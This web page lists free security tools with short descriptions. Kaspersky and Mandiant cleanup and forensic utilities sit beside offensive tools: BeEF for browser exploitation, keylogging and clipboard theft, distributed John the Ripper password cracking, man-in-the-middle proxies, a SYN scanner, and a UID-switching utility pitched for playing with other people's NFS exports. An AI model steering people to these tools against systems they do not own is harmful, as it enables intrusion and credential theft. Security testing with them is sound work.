    HackArmoury Free http://hackarmoury.com/tools
    Microsoft Free http://www.microsoft.com/download/
    Phenoelit Free http://phenoelit.org/fr/tools.html
    techsupportalert Free Massive tools list

    Kaspersky Free Tools

    Kaspersky Virus Removal Tool (free): Virus Removal Tool is a utility designed to remove all types of infections from your computer. It employs the effective detection algorithms used by Kaspersky Anti-Virus and AVZ. It cannot substitute for a resident antivirus application.

    http://www.kaspersky.com/antivirus-removal-tool-register

    Kaspersky Rescue Disk 10 (free): Kaspersky Rescue Disk is designed to scan, disinfect and restore infected operating systems. It should be used when it is impossible to boot the operating system.

    http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

    Kaspersky Security Scan (free): Kaspersky Security Scan provides a free-of-charge, easy way to find viruses and other threats that may be hidden on your PC, plus advice on your PC's security status.

    http://products.kaspersky-labs.com/products/multilanguage/special/kss2/kss12.0.1.117mlg_en_ru_fr_de.exe

    Mandiant free tools



    Redline

    Mandiant Redline is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.

    IOC Editor

    Mandiant IOC Editor is a free editor for Indicators of Compromise (IOCs).

    IOC Finder

    Mandiant IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).

    Memoryze

    Free memory forensics software designed to help incident responders find evil within live memory.

    Audit Viewer

    Audit Viewer is an open source tool that allows users to examine the results of Memoryze's analysis.

    Highlighter

    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files.

    Red Curtain

    Software for incident responders that helps find and analyze unknown malware.

    Web Historian

    Assists users in reviewing websites that are stored in the history files of the most commonly used browsers.

    Research: PdbXtract

    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.

    Research: Mandiant ApateDNS

    ApateDNS is a tool for controlling DNS responses through an easy-to-use graphical user interface (GUI).

    Research: Mandiant Find Evil

    A malware discovery tool which uses disassembly to detect packed executables.

    Research: Mandiant Heap Inspector

    Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.

    Research: Mandiant Metasploit Forensic Framework

    The Metasploit Forensic Framework (MSFF) is a proof of concept tool that can potentially reconstruct an attacker's meterpreter sessions.

    Research: Mandiant MindSniffer

    MindSniffer is a tool that will allow the user to translate snort signatures to either XML jobs or Python plug-ins that can be used to identify processes containing strings that match snort signatures.

    Research: Mandiant Restore Point Analyzer

    A simple forensic tool to analyze change.log files from restore points to determine the original paths and file names of files stored inside restore points.



    BindShell Tools link
    BeEF
    BeEF is the browser exploitation framework. Its purpose in life is to provide an easily integrable framework to demonstrate the impact of browser and cross-site scripting issues in real time. The modular structure has focused on making module development a trivial process, with the intelligence existing within BeEF. Some of the basic functionality includes keylogging and clipboard theft.
    Become
    The become utility changes the current effective, or real, user and group identity to those specified on the command line. The default shell (/bin/sh) is then executed.
    UID and GID are specified numerically and do not have to be currently defined on the system.
    Lots of fun when playing around with other people's NFS exports.
    Coder
    A Windows utility to encode and decode various encoding schemes. Currently supports Base64, Hex, HTTP URL Encoding and MD5.
    Dnetj
    Dnetj is a distributed client/server version of John the ripper.
    It is operated in much the same way as distributed.net or setiathome, but is designed to crack password hash files.
    ETrace
    ETrace is a configurable static port network tracing tool, similar to traceroute, but supporting ICMP, TCP, UDP and other IP protocols.
    Echo Mirage
    Echo Mirage is a generic network proxy. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified.
    GenIP
    A small utility, based on the Nmap target specification code, for quickly and easily generating lists of IP addresses.
    ICMPScan
    Does what it says on the tin: scans the specified address, or addresses, for ICMP responses. Handles echo (type 8), timestamp (type 13), address mask (type 17), information (type 15) and router solicitation (type 10) requests.
    John The Ripper MPI Patch
    This is an updated version of Ryan Lim's patch for john the ripper to support MPI, in addition to a large number of third party patches to support additional ciphers and such.
    MassResolve
    This program performs multi-threaded reverse DNS lookups. It can be passed a netblock or a file of IP addresses to process.
    ObexSend
    ObexSend is a simple command line tool to transfer a file via OBEX FTP to a device with a Bluetooth interface. It requires the user to specify the MAC address of the destination device, the OBEX FTP channel and the name of the file to send.
    Odysseus
    Odysseus is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Odysseus will intercept an HTTP session's data in either direction and give the user the ability to alter the data before transmission.
    RFIDTool
    RFIDtool has been designed to perform atomic tasks on RFID tags. This focus allows the tool to be easily incorporated into scripts to achieve more complex and useful tasks. One example is to load RFID tags with varying data depending upon their storage size.
    SSLCat
    SSLCat is a netcat-like utility with SSL support. SSLCat is a simple Unix utility that reads and writes data across an SSL-enabled network connection.
    SSLCat accepts a hostname and optional port number (443 is used if none is specified) and attempts to form a SSLv2 connection to the specified host. If all goes well, data is read from stdin and sent across the encrypted connection, while incoming data from the encrypted connection is sent to stdout.
    Screen Shooter
    A Windows utility that simplifies taking screenshots of either the currently focused window or the entire desktop. Screen Shooter uses configurable hot keys and supports Bitmap, GIF, JPEG, PNG and TIF image formats.
    SynScan
    A quick half-open port scanner. This tool will send TCP packets with the SYN flag set at the destination address. SynScan will send traffic as fast as the host network interface can support.
    Telemachus
    A companion utility for Odysseus allowing further analysis and manipulation of HTTP transactions.


    This article is being updated on a regular basis.


    Note: ONLY USE THESE TOOLS ON YOUR OWN NETWORK